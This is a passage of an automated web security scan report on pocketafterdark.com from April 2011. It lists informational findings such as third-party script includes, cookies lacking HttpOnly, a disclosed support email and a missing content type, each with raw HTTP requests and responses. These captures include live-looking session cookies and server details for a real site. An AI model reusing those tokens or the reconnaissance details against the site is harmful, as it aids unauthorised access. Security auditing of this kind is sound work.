Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/displayHomePageExperience.kickAction

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /service/displayHomePageExperience.kickAction?page=Homepage&as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:21 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:21 GMT
Content-Length: 58098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- NONAUTHENTICATED CONTAINER -->
...[SNIP]...
<link class="ka_style" rel="stylesheet" type="text/css" href="http://css.kickstatic.com/kickapps/cssc/5.5.2-916/ui-elements/ui-core.css" />
   <script type="text/javascript" src="http://js.kickstatic.com/kickapps/jsc/5.5.2-916/core/core.js"></script>
...[SNIP]...
</script>


   <script src="http://js.kickstatic.com/kickapps/jsc/5.5.2-916/swfobject2.2.js" type="text/javascript"></script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="https://rpxnow.com/openid/v2/widget"></script>
...[SNIP]...
<link href="http://dev.kickapps.com/pocketAfterDark/css/pad_fb.css" type="text/css" rel="stylesheet">
<script src="http://hosting.kicknetwork.com/afterdark/js/cufon-yui.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js" type="text/javascript"></script>


<script src="http://hosting.kicknetwork.com/afterdark/js/ka_romance.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.rating.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/cookies.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.metadata.min.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.form.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/jquery.colorbox-min.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu-v.css" />
<script type="text/javascript" src="http://hosting.kicknetwork.com/afterdark/smoothmenu/ddsmoothmenu.js">

/***********************************************
* Smooth Navigational Menu- (c) Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dyna
...[SNIP]...
<!-- Begin Client Side Body Code -->
<script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/w/36151.js"></script>
...[SNIP]...
</div>

<script src="http://hosting.kicknetwork.com/afterdark/js/ka_afterdark.js" type="text/javascript"></script>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
<script type="text/javascript" src="http://affiliate.kickapps.com/js/facebookConnect.v2.js"></script>
<script type="text/javascript" src="http://hosting.kicknetwork.com/afterdark/js/ka_afterdark_facebook.js"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/font-replace.js" type="text/javascript"></script>
<script src="http://hosting.kicknetwork.com/afterdark/js/legal_pages.js" type="text/javascript"></script>

<script src="http://dev.kickapps.com/pocketAfterDark/js/script_fb.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://www.simonandschuster.com/javascripts/s_code.js">
</script>
...[SNIP]...

6.2. http://pocketafterdark.com/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /xd_receiver.htm HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=6e36d235a603a399bcb04dd8466b605c&extern=0&channel=http%3A%2F%2Fpocketafterdark.com%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; as=159176; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"301-1303961513000"
Last-Modified: Thu, 28 Apr 2011 03:31:53 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 301
Date: Thu, 28 Apr 2011 18:31:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<body>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

7. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://pocketafterdark.com/service/displayHomePageExperience.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/displayHomePageExperience.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/displayHomePageExperience.kickAction?page=Homepage&as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:21 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:21 GMT
Content-Length: 58098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- NONAUTHENTICATED CONTAINER -->
...[SNIP]...

7.2. http://pocketafterdark.com/service/getKaMessages.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/getKaMessages.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/getKaMessages.kickAction?as=159176&version=1281385368000 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; as=159176; BIGipServerapp_server_pool=1773119680.42015.0000

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:26:01 GMT; Path=/
Cache-Control: max-age=31536000
Expires: Sun, 15 May 2011 19:06:30 GMT
Content-Type: application/x-javascript;charset=UTF-8
Content-Language: en-US
Date: Thu, 28 Apr 2011 18:26:01 GMT
Content-Length: 16674


Ka.Messages = {
Common:{
        HELP:'Help',
           ajaxError:'There was an issue processing your request. Please try again later.',
           flagCommentAsInappropriate:'Flagging notifies the ($siteNam
...[SNIP]...

7.3. http://pocketafterdark.com/service/redirectByServerName.kickAction  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/redirectByServerName.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/redirectByServerName.kickAction?u=down.gif HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; as=159176; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 301 Moved Permanently
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:21 GMT; Path=/
x-appserver: app3
Location: http://pocketafterdark.com/service/displayHomePageExperience.kickAction?page=Homepage&as=159176
X-Cnection: close
Content-Length: 0
Date: Thu, 28 Apr 2011 18:32:21 GMT


7.4. http://pocketafterdark.com/user/loadLoginPopup.kickAction  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /user/loadLoginPopup.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/loadLoginPopup.kickAction?as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015244238; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:36 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:36 GMT
Content-Length: 4449

<!-- HTML POPUP CONTAINER -->
<form id="ka_loginPopup" method="post" action="/user/userLogin.kickAction?optOutUserId=" enctype="application/x-www-form-urlencoded">
       <input type="hidden" id="as" name=
...[SNIP]...

8. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /service/displayHomePageExperience.kickAction

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /service/displayHomePageExperience.kickAction?page=Homepage&as=159176 HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: as=159176; Expires=Fri, 29-Apr-2011 18:32:21 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Thu, 28 Apr 2011 18:32:21 GMT
Content-Length: 58098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- NONAUTHENTICATED CONTAINER -->
...[SNIP]...
<input type="hidden" id="affiliateSiteHelpEmail" name="affiliateSiteHelpEmail" value="pocketafterdark@simonandschuster.com" />
...[SNIP]...
<input type="hidden" id="affiliateSiteHelpEmail" name="affiliateSiteHelpEmail" value="pocketafterdark@simonandschuster.com" />
...[SNIP]...

9. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pocketafterdark.com
Path:   /favicon.ico

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: pocketafterdark.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=922FB52E4AB0EC880AB5878EE3961771; BIGipServerapp_server_pool=1773119680.42015.0000; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_nr=1304015164529; s_sq=%5B%5BB%5D%5D; __utma=266260366.27168072.1304015165.1304015165.1304015165.1; __utmb=266260366; __utmc=266260366; __utmz=266260366.1304015165.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); base_domain_6e36d235a603a399bcb04dd8466b605c=pocketafterdark.com; fbsetting_6e36d235a603a399bcb04dd8466b605c=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; as=159176

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"1150-1303961512000"
Last-Modified: Thu, 28 Apr 2011 03:31:52 GMT
Content-Length: 1150
Date: Thu, 28 Apr 2011 18:32:23 GMT

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

Report generated by XSS.CX at Thu Apr 28 13:48:48 CDT 2011.